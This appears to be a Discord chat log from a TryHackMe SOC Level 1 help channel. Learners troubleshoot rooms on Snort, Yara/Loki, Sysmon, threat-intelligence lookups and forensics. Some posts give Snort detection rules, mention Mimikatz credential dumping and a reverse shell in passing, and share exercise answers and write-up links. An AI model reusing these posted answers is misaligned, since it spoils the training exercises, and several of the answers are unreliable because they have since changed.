"From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..." this cannot be found anymore I think..
I've looked up the answer and I can't find it anywhere, I've changed Talos and VT
~~https://tryhackme.com/r/room/threatinteltools~~

I'm wrong.

On tryhackme room when you finish all the tasks. 😀

The ones I have look different...

They look like this for example

I don't know,tryhackme gave me that one.

yeah they updated the look some time ago

Aha

So would mine be updated then?

The early ones are like yours

mine are old school

yep

don't think they have implemented that renewal of the cert images/generation of new certs

scam :(

720 Points and I'm GOD

I dont't think it's because of the points/level you have

I know, but just happy about that

@tender salmon Search the attachments hash on virus total.

I did, it didn't show the expected result

MalwareBazaar just didn't give ANY result, Talos gave some but the one

Looked at screenshots of write-ups, the hashes did match so I didn't mess that up

I just searched the md5sum of the attachment and got the answer.

I did the SHA256 as requested by websites

Just checked that too, got a match.

Share screenshot in DMs?

I was looking at the wrong colom on VT...

I don't wanna talk about it

lol, glad you got the answer.

Loki is throwing some errors
https://tryhackme.com/r/room/yara ```
cmnatic@thm-yara:~/tools/Loki$ python3 loki.py -h
Traceback (most recent call last):
File "loki.py", line 43, in <module>
from lib.lokilogger import *
File "/home/cmnatic/tools/Loki/lib/lokilogger.py", line 15, in <module>
from helpers import removeNonAsciiDrop
ModuleNotFoundError: No module named 'helpers'

opps my badge removed as they added new labs ? ok fine ....

Which badge? the labs etc. Can you share more details / SS etc so it can be looked at?

Really old school, it still has Darks name on it.

just ben and ashu :(

yo guys , there is 19 chalenges that will be add today in socl1path ?

19? I though just a few

19yes

@hot thorn Yes - 19! 🙂 The update will be taking place shortly after 4PM BST (in the next 5-10 minutes)

i'm excited for the extra content but i'm ready to finish this path and get on to pentest+ lol

Is there anyone who can help with a potential issue with a challenge in the Threat Intelligence Tools room that is part of the SOC 1 Path?

Anyone having issues with the website?

I was on earlier this morning, EST, and just got back on a few minutes ago too.

Site is back up good to go

I never get badges on rooms that I've finished before they're assigned to a learning path. Kind of a bummer.

same here buddy any suggesions

@upper dew @fierce frost @leaden tapir the room has been bugged for a little while now. I've reported that issue some time ago and it's either not been fixed or deemed working as intended

for destination address of packet 63 not taken the last number it asking for 2 digits

i just tested the room with a single rule for port 80 and it's working as intended

at least for Q2 task 2

the destination IP is the one the room expects

Okay, yea I tried to report it myself but didn't find away to. I have attempted adjusting the rules and nothing helps so I moved on. if you have any suggestions to get the answer that be great help.

I just tested the room with the correct snort rule and it seems to be working

I'm going step by step to confirm 100% but right now it seems fine

Just checked all the questions and their answers, it's working as intended now

the two that I'm missing is shown below, not sure why the answers I get don't work or are accepted

Yep, checked those as well. The correct answer is in the correct packet

So you have 2 rules written now, any 80 <> any any and any any <> any 80

that's why you have the wrong answer. You only need one of those rules

output with 2 rules

and correct output with 1 rule

Please don't post room answers in chat.

Did not like Windows forensics 1/2, machine is too slow to load files.

hi is there some bug on snort challenge basic? in the question number 2?
"Investigate the log file.

What is the destination address of packet 63?"

i already investigated it and found the ip i keep getting wrong answer

I'm wondering .. is this path gets u to really understand real-time procedures and scenarios .
Like how to handle events and responsed .
In other words is the completion of this path + comptia pentest+ cert + ccna + 2 years experience as a network technician enough to get me my first job in the field???

no one can answer if you will get a job

that’s circumstantial

but more knowledge would surely help

I completed that yesterday and it worked fine. Check your snort rule carefully

thanks mate i already finished it yesterday

Gave +1 Rep to @floral zodiac (current: #1436 - 2)

Nice!!

is the VM machine is really slow?

I doing the network miner and the VM is super slow

At times, yes. They all take about a minute to boot up. Overall, not bad speed just have to be patient after the initial boot up

i got no problem with the boot up but when im doing the applications on the vm is really super slow to hover

Interesting

You using the attack box?

yea sometimes the attack box too when im using it the linux terminal or the applications there is really slow to move

If you haven’t already, try changing your region in the access section of the site. No clue if that works but maybe? Seemed to help me a while ago as I’m not having as many slow sessions as I used to, at least that’s what it feels like

ok, i'll try that mate thanks for that.

No prob my dude

I appreciate the challenges added to each section. helps put the specific skills to test outside the set questions.

Hi there, Is there an alternative to app.phishtool.com ?

Are you trying to read the E-mails in the attackbox?

Yes

Use Thunderbird mail, the tasks advises this.

Thank you!

Gave +1 Rep to @primal igloo (current: #1 - 2558)

Are we suppose to attach the email to thunderbird, as I am unable to setup an account on Thunderbird

Account isn't needed 🙂

Just hit cancel

In "Cyber threat intelligence" Scenario 1, after I input the file sha256 the report didn't show any Detection Alias that starts with an H'

Hello, any suggestions on how to change region in THM? My VM takes long to load. But also, when I try to open a file in Chrome, I get "out of date". Any suggestions? I submitted a ticket but haven't heard back

Go to the top of the website toolbar and click the Access selection. You can change your server there

Ps I have no clue if this actually helps anything. Could be total placebo 🫠

Actually it did lol. Thanks a lot. The only issue I have to deal with is why chrome in the attackbox keeps on saying outdated and i cant get it to update lol

Gave +1 Rep to @floral zodiac (current: #882 - 4)

Nice! Glad to know it helped. Try using firefox instead.

Question: Mimikatz, a Know attack tool, was detected running on the IT Manager's computer what is the mission of the tool?

What is Mimikatz mostly used for?

Credential dumping

😄

I did that room a while back but if I remember correctly there’s a button where you open file or something on the top right of the thundermail webpage

boogeyman1
any hint here ?

used tshark to retrieve the ex-filtrated file which starts with 27f***** and converted most of the ascii strings into text but i can't locate the credit card number is there a shorter way ?
Update: i think the last question is a bit advanced.

@open quest

I’m in the e Sysmon room on task 4 third question. I have identified the event and have tried to put in the UTC time as requested but it marked as incorrect, I checked writeups and videos and everyone is getting the same answer?

can you share your answer ?

yes one second i got disconnected

should i send as a spoiler?

||2021–01–06 01:35:50.464||

im not sure what just happened maybe there was a punctuation mark i didnt see or something i just resubmitted the answer and it worked

thanks for responding mach

You are welcome

For those working in this field what other labs for try hack me will you recommend me to complete as I just completed splunk any other's interesting labs?

While I’m not in the field currently, I’d think all of what’s listed in the SOC 1 path will be relevant…I’d hope at least!

IDS/IPS modules, EDS there’s so much you can do in the SOC learning paths.

Oh is your current relating to any cyber security?

Would anyone be able to answer a question for me about the itsyBitsy room? I found the answer to the second question concerning the suspicious IP but I was wondering what exactly makes it suspicious? Is it that its ||User_agent is an admin account||?

added spoiler to avoid the clue if anyone doesnt want it

Soc is a cyber role. Check it out - tons in the learning path. I would think it’s practical Information otherwise we’d all be wasting our time and money (which we aren’t IMO)

Hello there, can someone explain how to use snort to analyse a packet: Must I use the conf file every time I use snort i.e /etc/snort/snort.conf? When I run snort e.g "sudo snort -de" and I run the traffic script it doesn't change anything on the snort prompt ( The instruction stated it should show in Verbose mode after running traffic script) what could I have been doing wrong

Hello who's at the retracted room right now?

I can't seem to find the answer for task 2 q3 the time in details of the file is wrong

#1265686354990207056 might be some help.

Lots of people have trouble with that one, including me, I spent probably a couple hours on it before I was even in the right log collection. Make sure you’re searching in the right area first

Oh thanks

if you go to the #1265686354990207056 room discussion on this discord you will actually see me have my aha moment and maybe get a couple hints to help you along the way.

I've finished my 2hrs without advancing I'll just sleep through it now hoping to get answer tomorrow I'm very sleepy that I can't focus 😆

I feel that I got really frustrated with that room hope you get it tomorrow!

is anyone else having trouble with the splunk basics room? When I try to search for the IP 107.14.182.38 to find the username in the question I get 0 results? I watched a youtube writeup and followed it exactly but he is getting results?

the last IP of the same task is also not appearing?

For some challenges you might need to write your own rule to get the right output. In most challenges you substitute the snort.conf file with a local.rules (or equivalent) file

Thank you, I am still trying to understand how to use it, writing rules I guess should come later.

Gave +1 Rep to @scenic heron (current: #1449 - 2)

Hello there, In Snort Task-8, how are we suppose to get a pcap ?

If it's for the basic snort room all the pcaps should be on the machine attached to the room

No, it's not when I run the command "snort -r icmp-test.pcap" I was greeted with an error "file or directory not found

Are you running snort from within the task 8 directory?

Either run the shell from within the directory or cd to it

🥸 wow, I didn't realise that. Thank you for your time 🙂

no worries

I'm in cyber now. They asked about IDS/IPS EDS in the interview. They also asked about WAFs, and Firewall rules.

One thing I've learned is no matter how experienced you are, it pays to study for your interview. So when you start interviewing make sure you do some interview prep. Youtube has tons of videos on soc analyst interview questions

Thanks! I have yet to break into the industry so speaking merely off of what I’d expect to be true

Gave +1 Rep to @autumn garden (current: #2182 - 1)

In the TEMPEST room there is a tool on the attached VM called SysmonView. The room says it is one of Eric Zimmerman's EZ Tools but it isn't. I've searched everywhere for a place to download that tool with no luck.
Does anyone have an idea as to where I can download or obtain a copy of that tool?

Are you in the split screen or the attackbox?

When I booted the VM up, it was called Tempest VM

Also the room links Zimmermans github.

Hi Scrubz,
Thank you for your answers.
I don't have any problem using it in the VM. I want to download and use it on personal computer so I can practice different scenarios.
I also have clicked the link for EZ tools but SysmonView is not listed on his github page with the rest of the EZ tools.
Like I said I want to find it to use in my personal computer.
Do you or anyone else know where I can find it?

https://github.com/nshalabi/SysmonTools is this what you're looking for?

Lana
Yes, That is what I'm looking for. Thank you!

Gave +1 Rep to @torpid acorn (current: #1458 - 2)

For Threat Inteligence Tools Task 7, is it possible that the detection aliases for the hash have changed? I've googled and found the answer, but it just isn't included in the Talos list anymore.

Yes, I can double check later. 🙂

For windows forensics 1, why is the last known good configuration control001 when in the text it says this?
|| In most cases, ControlSet001 will point to the Control Set that the machine booted with, and ControlSet002 will be the last known good configuration. Their locations will be:

SYSTEM\ControlSet001

SYSTEM\ControlSet002 ||

Hello everyone, there seems to be a bug in the “Benign” room question #9 (The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?). I tried using the flag located at https://controlc.com/e4d11035 but it’s not working.

I put this in the room bugs chat a few weeks ago I’m not sure if they are working on anything for it right now or not.

hmm, I'll look into this. Thanks for pointing it out.

Gave +1 Rep to @timid vale (current: #2204 - 1)

No problem. Do I get a cookie? A 1 month voucher maybe? 😉

I think the text to the question could be clarified or maybe changed. The SYSTEM\Select\LastKnownGood REG_DWORD contains the value to what currentcontrolset was the last known good. (maybe that is currentcontrolset001, maybe currentcontrolset002). In the body of Task 6 it talks about LastKnownGood and it has as screenshot showing LastKnownGood as 0x1 so the question/answer is correct as per this screenshot. The text mentioning ControlSet002 would could do with an clarification or rewording. Maybe even a better question could be around what registry would you look for to identify what CurrentControSet holds the lastknowngood.

Hey all, I am having an issue in a VM within the Snort challenge - Basics. As soon as I create a log through the snort command line (sudo snort -c local.rules -l . -r [pcap file]) the log appears for a second and then disappears.
Such thing never happened before in any of the previous excercise.
Can anybody help me?

I spawned the machine few times and now it works!

Hi team, I just wanted to report some ambiguity with questions or confirm if maybe I'm missing something, going through the MITRE room as a refresher and getting the below questions. Specifically, the questions in ATT&CK Framework citing "this technique" is vague (Q's 2 and 3) and doesn't highlight what technique needs to be ID'ed. Am I missing something here or is this insufficiently worded?

(I would show a screenshot but I have limited privileges, assuming due to being new.)

Never mind, overlooked the content wording toward the bottom of the task, Answer the questions below didn't reference it, that's on me for not reading close enough

Q5 of that task may need an update as there are four groups now

Q10 also incorrect, techniques have increased to 16

Hi. In the T&VM Mitre room, this question "What groups have used spear-phishing in their campaigns? " might need to be validated. I think the answer should be Axiom,Hikit not Axiom,GoldSouthfield.

Hello, Hikit is malware, not a group

Thanks for the reply! 😉

Gave +1 Rep to @dapper flame (current: #2212 - 1)

Hmm

There is a way to verify your THM account so that you can do screenshots just can’t figure out where the pinned message is so that I can tag you with it. Anyone else know what I’m talking about?

this article

Hey guys,
I'm working on
SOC Level 1: Network Security and Traffic Analysis - Snort Challenge - The Basics, and I’ve hit a bit of a roadblock with some questions. I’ve managed to get the correct outputs, but they aren’t being accepted as correct answers. Here’s what I need help with:

1. Destination address of packet 63
My answer: 145.254.160.237
2. ACK number of packet 64
My answer: 0x38AFFFF3
3. SEQ number of packet 62
My answer: 0x38AFFFF3


   I’ve checked the log files as per the hints, but I’m still having trouble. Any guidance on what I might be missing or doing wrong would be greatly appreciated!
   Thanks in advance for your help!

hi , i have a problem with phising prevention room , when i submit the answer which is "<domain> service ready" dose not working, please help me to solve the problem i still just have this question and than finsh the whole room on soc1

Edit: I found a shared link with the most updated correct answers 😉 : https://github.com/cyberterms/tryhackme-write-ups/blob/main/snort-challenge-the-basics/write-up.md

Same with me

i think the problem not from us the problem with tryhackme

Which question?

Make sure you capitalize the S in service

Ah i see you got an answer

i found the solution from someone on the discord the problem was to remove just <> and it will be the answer like this. domain service ready

My answer was <domain> Service ready

If you try it with another account it won't work

now , how can i download the certificate, it just appear without the download button

you are a real life hero man, i gotta tell you that

Certificate for the learning path completion?

Hey team, I'm working through the Snort Challenge - The Basics and I could use some help. I can't get the correct answer/number of packets for question 1 in the "Writing IDS Rules (HTTP)" section. I keep getting 328 and my rule to detect "all TCP port 80 traffic" goes as follows: 1. alert tcp any 80 <> any any (msg:"TCP Port 80 Src Traffic"; sid:100001; rev:1;) 2. alert tcp any any <> any 80 (msg:"TCP Port 80 Des Traffic"; sid:100002; rev:2;)

Haha, thanks! Took me long enough, but if I can’t save the world, I hope I saved you some time! 😄

Gave +1 Rep to @final stream (current: #2220 - 1)

Hello there, I am trying to use Wazuh server but it kept showing "The connection has timed out" I waited more than 5 minutes before accessing the link

Hi guys,
I'm currently stuck on the Yara room, task 9 (Creating Yara rules with yarGen), with the question "Copy the Yara rule you created into the Loki signature directory"
The question doesn't ask for an answer but I just don't understand what they asked me to do, my common sense that's broken here, so am I supposed to move the file "file2.yar" to the same directory as the file "loki.py" or am I supposed to run a command to copy the content of "file2.yar" inside the file "loki.py" ?

You need to put the rule inside the directoy Loky.py uses to test files

Thanks for your answer !
Can I just do file2.yar >> loki.py or do I need to manually copy some lines inside ?

Gave +1 Rep to @dapper flame (current: #1116 - 3)

Okay nevermind, my brain started to work again, I didn't get that the "Loki signature directory" from the question is in reality a directory called "signature-base" and I needed to move the "file2.yar" rule to the sub folder called "yara"

Hey there, I don't know if it's a bug or not :
I'm in the OpenCTI room on the task 6 for the question "How many malware relations are linked to this Attack Technique?" and so I'm looking in the 'Related Entities' category (in the Knowledge tab) to see how many there are but it's empty (image 1) and when I look in the Overview category (still in the Knowledge tab), I can see 3 malwares (image 2) related but the answer expect 3 characters so I'm a bit confuse. I also check in the Malware category and indeed there is 3 malwares related (image 3) but I still don't find an answer
If someone could lend me an hint I would be grateful

EDIT : I got the answer, there is 2 technique with the same name, I was looking at the wrong one

Hi all.
I have a question about the "Retracted" room in the SOC level 1 path.
A file named antivirus.exe is present at C:\Users\Sophie\download\antivirus.exe
That file had to be created at some time. Why is there no sysmon event 11 that contains the words download\antivirus?
If you check the properties of the antivirus file it shows to have been created on ‎Monday, ‎January ‎8, ‎2024, ‏‎2:14:27 PM
The attached pic shows a process creation at 2:15 as the first time "download\antivirus" is found. How can a file be created without there being a event 11?

I cant seem to connect to the opencti dashboard on the opencti room? I gave it 10+ min on attackbox but still refusing connection

Nmap it.

Got it now, took almost 20 min to start up though

Yeah, that service possibly takes the longest.

└─# nslookup tryhackme.com 10.200.26.101
;; communications error to 10.200.26.101#53: timed out
;; communications error to 10.200.26.101#53: timed out
;; communications error to 10.200.26.101#53: timed out
;; no servers could be reached

``` why is it not working?

https://tryhackme.com/r/room/breachingad

Check pinned posts in #breaching-ad

hmm

Is sysomon kinda like a local siem?

Where you can set up rules and alerts, unlike event viewer or process viewer?

i'm on the threat intelligence tools room task 7, I generated the hash and fed it into the talos and while it does show me several aliases none of them start with H

#room-bugs message

hm

I don’t think you set up rules but sysmon basically monitors logs system activity and sends it to event viewer

Only thing I can think of is integrating sysmon with a SIEM so you can do both and have less noise in your SIEM

Also sysmon logs process creation which is very helpful too

6

Hello, is there a problem on VM MISP_2023_v4 ? I just have Gateway time-out

Problem solved: the link don't replace the ip 🙂

I thought the learning path are free but I have not been able to subscribe

Hey THM community, I'm struggling with the room "Creating Yara rules with yarGen'. Please DM me if you could help :)))

Apparently, Talos updated their aliases list or something. Anyway, I was able to get it from VirusTotal

ask it here.

hey fam having the same problem. is something supposed to come up? the box loaded but not sure how to connect still

oh there finally it loaded 20min it is 😆

Yeah it takes a long while

Please do anyone have books on incident response or SOC

more likely to find answers in #bookclub

@nimble oasis thank you

Gave +1 Rep to @nimble oasis (current: #3 - 1924)

Hey all, just completed the Retracted Room in the SOC 1 learning path, I was wondering if anyone knows why a malicious actor would gain a change of heart and decrypt all the encrypted files/donate a large sum of bitcoin after the fact. There must be more to this that I'm missing, no?

Hello.
I've got a question but I'm not sure if this is the right chat. If not, I'll delete it, I'm doing the SOC path but every time I use the attack box, it takes an extremely long time to load, write, and open tools. It’s taking me twice as long to complete tasks because of the lag. Is this normal? I've been using THM for almost a year now, but this is the first time I notice everything gets so slow

Some groups have rules on what to attack and what not to attack, see LockBit gave decryption key to sick childrens hospital the group in question kicked the member responsible for the attack.

Thank you! That makes a lot more sense now.

Gave +1 Rep to @primal igloo (current: #1 - 2884)

Can someone recommend a place to enhance Wireshark skills learned from the SOC L1 path? I gave www[.]malware-traffic-analysis[.]net a try, the exercises that exist on the site but even then, I only found like 1/10 of the information, the rest was incorrect, I know that Wireshark or analyst skills in general are crucial for the role and I wish to improve them, if anyone knows a way to do that or in general to recommend something, please let me know!

^^

I recommend analyzing orher sample pcaps

other sample pcaps from the same site? I tried the first one which I assume should be the easiest challenge and yet I failed miserably at it

https://wiki.wireshark.org/SampleCaptures

cheers, that looks pretty good

Thing is, it’s kinda hard to find other resources that explain everything because once you get the basics Wireshark commands, you have to use your investigative skills to find the stuff you’re looking for

Having trouble getting past SOC Level 1 -> Cyber Defence Framework-> MITRE-> Task 8, last question

@blissful loom or Other staff ^

Hey there, it seems like the MITRE framework has been updated, making the answer no longer valid.

The original answer is ||Azure AD, Google Workspace, IaaS, Office 365, SaaS|| which can be found under Valid Accounts: Cloud Accounts by referring to question #2 as mentioned in the task.

Using a wayback machine, you can see the valid answer here - https://web.archive.org/web/20240613094045/https://attack.mitre.org/techniques/T1078/004/

Hope that helps out, meanwhile I'll report the issue to the admins 🙂

Thank you. I was actually really close to the answer. I couldn't get Google Workspace.

Gave +1 Rep to @deep trout (current: #377 - 14)

You were definitely on right track, keep it going!

Hey there, currently doing the Secret Recipe room (Windows registry) and was working on the question
What is the Last DHCP IP assigned to this host?
based on the last Last Write Timestamp of one of the subkeys being 2022-10-12 8:53:05 PM UTC, I figured this subkey would contain the answer; however, the expected answer is actually from a different subkey which has the last write timestamp of 2021-03-17 2:58:47 PM UTC.

am I missing something or is the expected answer wrong?

The Summit room in SOC Level 1 -> Cyber Defence Framework->Summit. WHen launching the attack box the url given shows a bad gateway error?

504 or 405?

Damn i finally completed the Zeek room with almost no help from the write ups !
I'm feeling the knowledge pouring into me bits by bits at last !

congrats, keep it up

Hi, anyone got tips on how to gradually get better at solving the capstone challenges without relying on writeups somewhere down the line? I feel like the rooms themselves are manageable but its just that there are times where I get stuck, maybe just understanding the writeups is a good way to start and just repeating the room and writing every detail and thought I have would help? Just curious if anyone has some notes/pointers, cause I took a peek of soc level 2 and log analysis looks it would have been super helpful for the rooms in soc level 1 path, like soc-1 is really good at teaching basic fundamentals and how to use the tools, especially with the provided commands, but it doesn't really teach you how to think for yourself i feel like or maybe i'm doing something wrong :I

I am facing the same issues. Hope someone has better process to learn

Yeah.. I mean I play CTFs and didn't understand anything first few months, after reading most writeups per ctf i started getting enough knowledge to understand and start placing at least not at the very bottom of the CTFs lol, but i don't know if thats a good way to learn actual cybersecurity hahaha maybe someone got a really goated method, i start talking to myself to try and break down a problem but it gets looped back to the problem of me not understand enough of the basics or the actual thought process of where to look for the specific IoCs and etc, using tools is fairly okay, knowing where to look at and interpreting data is difficult, to say the least

it's completely fine if you feel struck some times, it's a part of the process and in that case you use writeups or blogs to solve the problems, remember it's important to keep learning while you are doing all of this, eventually you will be able to solve your problem on your own with the experience and knowledge you are getting. good luck 🤝

out of all the SOC stuff I've learned so far which is around 60% of it, Splunk is probably one of the coolest thing I've stumbled upon, it's creators deserve to be praised by security analysts

Im having issues completing Task 7 and 8 of
SOC Level 1 -> Cyber Threat Intelligence ->Threat Intelligence Tools
The second question on T7 and the second question of T8.

In not sure about T7, but I know T8 is ||Trojan||

For Task7 question
Go to attachments and copy the SHA-256 hash. Open Cisco Talos and check the reputation of the file. You will get the alias name. (hint given : starts with H)

For Task8 question
Copy the SHA-256 hash and open Cisco Talos and check the reputation of the file. You will get the name of the malware family here

I was also stuck on the same task. It took me 30 minutes to figure it out without walkthrough. I did the same @vagrant charm mentioned in the chat.

Great 👍

You also check in virustotal

Ahh GOtcha, Thank you! @vagrant charm

Gave +1 Rep to @vagrant charm (current: #245 - 25)

Took me 2 days even with the walkthru (dont ask me how lol). But finally got it. Thanks @vagrant charm @plush junco

Gave +1 Rep to @plush junco (current: #1181 - 3)

Hi, I managed to clear the capstone challenges for SOC 1, but somewhere down the line I had to use writeups, most of the email/basic splunk stuff was easy, but searching for specific answers just wasn't up to my knowledge, anyone know where I can read up on how to get the proper mindset to do hive forensics and etc?

I'm currently doing the Windows Forensics which contains Hive keys, if I get something in mind, I'll let you know 🙂

Thanks, I'm still stuck on understanding which hives to look at for specific data, I'll just be relying on cheat sheets for now

I don't see the option to download attachments literally anywhere. I can only access the email files within the VM. Very confused, could you please fill me in a little more? Thanks

Gave +1 Rep to @vagrant charm (current: #179 - 40)

To complete this task you need to get SHA-256 sum of the file you can type this in terminal sha256sum filename and check that hash value either in Cisco Talos and check under reputation section or you can use virustotal if you like

Hey, how much time does it typically take to complete the SOC Level 1 path? I’m preparing for a SOC role and plan to learn from the SOC Level 1 path and complete it within this month. After that, I plan to start applying for SOC jobs next month. What do you think of my plan? Is it possible to finish it within this month if I start today?

What does soc mean
Where we use it

The hyperlink for the Fireye apt group is not available and it redirects to the google cloud website Mandiant page.

In Pyramid of Pain room

phew, this one was slow-going for a bit, definitely not the most intuitive tool out there to get up and running with, but once I figured it out it was actually pretty cool and the practical portions of the room were very straightforward. definitely set aside a block of time for yourself when you do this one; besides the time it takes to figure out how to use it, just loading a project into the thing takes like 10-20 minutes.

Well if you spend like 5/6hs a day yes anything less and u wont but thats why u have the schedule planner on the right, put in the hours youll study and it will aproximate you when youll finish the course. Thats an aproximation ofc, not everyone spends 30 mins to read 3 general definitions and do 1 exercise

did you ever figure this out? im having the same issue with Redline and not got a clue what to do. i saw no reply to your issue

"System Information was not configured to be collected. Click here to review which audits where configured" and u click and it literally has all categories from Sys Information lmao

Hi

i have a problem with snort challenge - the basics, Task 2: all the questions i get are same as in writeups i found but when i type it in as answer it isnt good, so am i missing something or the code im running isnt good?

i just wanna know how did u guys do task 2, 2nd question and ill figure it out alone but for some reason it aint working

For task 2 question 2:
Check if you have sudo permissions to view any files snort produces - use command sudo chown +R ubuntu /home/ubuntu/Desktop/Exercise-Files/
Make sure the rules in local.rules are:
alert tcp any 80 <> any any (msg:"TCP port 80 inbound traffic detected";sid:1000000000001; rev :1) and
alert tcp any any <> any 80 (msg:"TCP port 80 outbound traffic detected";sid:1000000000002; rev :1) (place each rule on an individual line)
--EDIT--
Remove the previous alert file and snort log: sudo rm [PREVIOUS SNORT LOG] ; sudo rm alert
Run snort again with: sudo snort -A full -r ftp-png-gif.pcap -c local.rules -l .
--EDIT ENDS--
Search for the 63rd packet by using snort -r [SNORT LOG HERE] -n 63, then just look at the terminal to find the destination ip
hope this helps you out @fiery marsh

Hey community! I am facing an issue with room "Snort Challenge - The Basics". I completed all tasks but for three questions of Task 2 my answers are not accepted. Despite of that I think that my answer is correct the format is not matching the answer format and so it is not accepted. Here we go: Question 2 "What is the destination address of packet 63?" if I look into packet 63 I see as destination IP "145.254.160.237" but the wanted answer format is "...". The same for question 3 "hat is the ACK number of packet 64?" and 4 "What is the SEQ number of packet 62?" where my answers are not accepted. Could someone please en-light me? Thanks in advance....

help please

You may describe what type of help do you need and folks will surely help out.

I’m currently working on wireshark traffic analysis and have a question about the dns pcap question what is abnormal dns traffic?

Well it can be anything that stands out of the ordinary , for example , too many failed login attempts and suchlike 🙂

Has anyone else experienced problems with connecting to the MISP room?

Works fine for me 😄

It takes more than 10 minutes to properly run. So wait for few minutes

You get certificate if you complete SOC level 1? I just started, seems long too. Can I put it on my resume or should I just say I have experience in an SOC environment?

You can claim the certificate only after you finish the pathway 🙂

do i have to use my own email to use the phishtool?

No 🙂

Nvm to this, I am super slow

Hey, What room has the link to cyber chef?

Here's the link 🙂

https://gchq.github.io/CyberChef/

I’m stuck on task 5. How and what am I supposed to defang?

Type defang in cyberchef search menu and select Defang IP or URL depending on what you need to defang 🙂

I tried everything. What up address am I supposed to defang?

Which Task and which question ?

Task 5

What’s originating up address? Defang the up address

This room ?

https://tryhackme.com/r/room/cyberchefbasics

I'm in yara trying to start VM, its just black screen, what am I doing wrong? am I dumb?

No , you are not 🙂 . Have you tried to terminate that instance and start a new one 🙂

many times, I also tried other browsers, disable adblocker, another computer with another wifi still no use

Have you tried to start it in full-screen view 😦 ?

it won't let me, I press on view in full screen and nothing happens?

do I need to press start attackbox too? in addistion to start VM?

You shouldn't need to 😦 . Try to ask in this channel https://discord.com/channels/521382216299839518/559443389058252800 it's more active than this one 🙂

thanks!!

I'm almost completed the soc level 1 path(90%) done. Now i noticed the soc simulator anyone tried it yet? i'm curious about it and took a peak at it, but never wrote a report so is there someone who can help me with it?

I think that sim is only for business users for now 😦

How am I supposed to use virus total to scan a file if I can’t connect to the internet?

Use your own browser

I need the file

You don't , you can use hash of the file

Yall expect me to download a file off a VM to my computer?

That’s what I was thinking

I knew that

No , use hash of the file to searcg

lol

It is accessible and I can claim an allert for investigation then there is a button of write a report

Well , I am not sure then . I can't access it 🙂

strange. i assume you have a subscription

Yes , I have but it asks me to upgrade to business plan 🙂

connected again and it is working. was trying to make screenshot but can't paste it here.

You will have to verify in order to upload images 🙂

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

FYI: The Brim reference a tool which was reneamed Zui in 2021 and is concidered Legacy tool by the devs.

Well , thanks for informing me , I'll try 😄

Gave +1 Rep to @restive gull (current: #2586 - 1)

Has anyone else ran into difficulties with the NetworkMiner lab? Everytime I open the mx-7 pcap and apply filtering the app crashes then the VM either crashes or shuts down…

It worked ok for me 😦

This is the 4th time I’ve had to reopen the VM because it keeps crashing, the first 2 pcap files I had no issue with

Also on a side note in the same room, the question asking for which email sent the password reset. It’s not actually a password reset email.

I think I've had also same experience with some rooms from the SOC path taking very long to load or crashing, NetworkMiner could've been one of them but I cannot surely verify

I somewhat remember I had to analyze multiple PCAP files and some were working, others not really (slow load times / crashing)

And I am done, keep grinding at it! I got stuck a couple times, you will have it beat before you know it.

Congrats , great job 🥳

Hey, how come I can’t get Loki to run on the VM I tried everything. I’m stuck on this task

How long did it take you?

Months, but I also got stuck and focused on another cert for a couple months.

Keep up the good work 🙂

Make sure that you're in the Loki directory

I’m in the directory but the commands don’t seem to be working

Can you provide a screenshot 🙂 ?

I can't see anything here bro 🙂

Type ls

👍

It’s still not working

Why can’t I run Loki?

You tried to open lcki.py , try with loki.py 🙂

That's a file , you can't cd into a file 🙂

cd - change directory

I know

Then why are you trying to do so 🙂 ?

Cause I’m getting desperate

./loki.py

I’m a little rusty that’s all

Type ls in that dir so I can see the list of files

Try to use python loki.py

That work

I did that command before

That's it then 🙂

No

I’m not getting of the answers to the questions

Why is this not working

👋

You are in the wrong directory

The directions say to call Loki.py from within the directory with the suspicious files

note that I am calling Loki from the file 1 directory you called Loki from within the Loki directory

Where is the file name and version of the web shell?

Hey

How do you copy paste the hash so I can complete this task ?

Use clipboard

https://cdn.discordapp.com/attachments/521771811768107008/1313628477307617401/clipboard.gif?ex=678a2c9b&is=6788db1b&hm=47c0c219d23f6b199c1820ed820082d5b380e63d75db959a1e5c11bef83ae873&

I’m using my own machine.

I’m connected using OpenVPN

ctrl + shift + c
ctrl + shift + v

Then right click > copy

Not working

Not working

windows or linux???
vm or not???

I got it to work. Took a while to figure it out.

I’m just a little rusty plus I’m at my other job so my time is limited.

This is the safe bet, when I get going quick and accidentally ctrl + c the revshell 😂

🤣 You're definitely right , thanks for adding that benefit 🤣

Gave +1 Rep to @wheat crane (current: #255 - 26)

Hi there, how are you guys doing ?
I'm currently working on the snort challenge - The Basic room and I'm stuck on Task 4, the first question : "Investigate the logs and identify the software name embedded in the packet."

I'm trying to run the following command : sudo grep -a -i "software" snort.log.1737399919
but all I get is a bunch of unreadable characters, can you give me an hint to put me on the right path please ?
I tried to run the command with an others strings but nothing so far

Can you provide a screenshot 🙂 ?

Hello everyone. I have a bit of hiccup in Windows event logs task 5.1 and task 5.2.

Can anyone help me?

What's the problem 🙂 ?

I can't send screenshot here

You can but you will have to verify first 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

These are where i have issues in